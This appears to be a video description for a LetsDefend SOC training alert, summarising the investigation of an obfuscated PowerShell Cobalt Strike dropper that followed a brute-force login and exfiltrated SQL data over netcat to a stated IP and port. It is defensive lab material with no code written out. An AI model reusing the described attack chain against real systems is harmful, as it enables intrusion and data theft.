Suspicious PowerShell — Cobalt Strike Dropper, Brute Force Entry & SQL Exfil | LetsDefend SOC153
Day 109 of Becoming a SOC Analyst — SOC153 Suspicious PowerShell Script Executed (True Positive)
endpoint.ps1 executed on host Matt (172.31.34.35) under the Administrator account following a brute force login from 3.16.42.241. The script contained multiple obfuscation layers — base64 and gzip encoding concealing a Cobalt Strike dropper plus an XOR-encoded secondary payload — which performed system reconnaissance before exfiltrating SQL database data to 3.16.42.144 over port 4444 via netcat. Attack artifacts were wiped by the attacker post-execution, but the full chain was reconstructed — brute force → obfuscated PS1 → Cobalt Strike staging → recon → data exfil confirmed. Real cyber attack scenario and got two playbook paths wrong on this one, walked through the reasoning in the video.
🔬 Analysis Reports
🧪 Any.run → https://any.run/report/8dfafede280614...
🦠 VirusTotal (endpoint.ps1) → https://www.virustotal.com/gui/file/e...
🦠 VirusTotal (payload) → https://www.virustotal.com/gui/file/8...
🔵 What I Cover
Threat Detection · Alert Triage · SIEM Analysis · Log Analysis · Incident Response · Blue Team Tools
🚨 Open to Work — Seeking a Level 1 SOC Analyst role in Melbourne or Remote (AU)
📂 Portfolio → inksec.io
💼 LinkedIn → linkedin.com/in/tate-pannam-8b64b23a3
If you chose the red pill... 0x74617465.sh
#SOCAnalyst #BlueTeam #Cybersecurity #CobaltStrike #PowerShell #BruteForce #DataExfiltration #Netcat #IncidentResponse #SIEM #Day109 #CyberSecurityJourney #Melbourne #LetsDefend #LetsDefendSOC #ThreatHunting #InfoSec #BlueTeamSecurity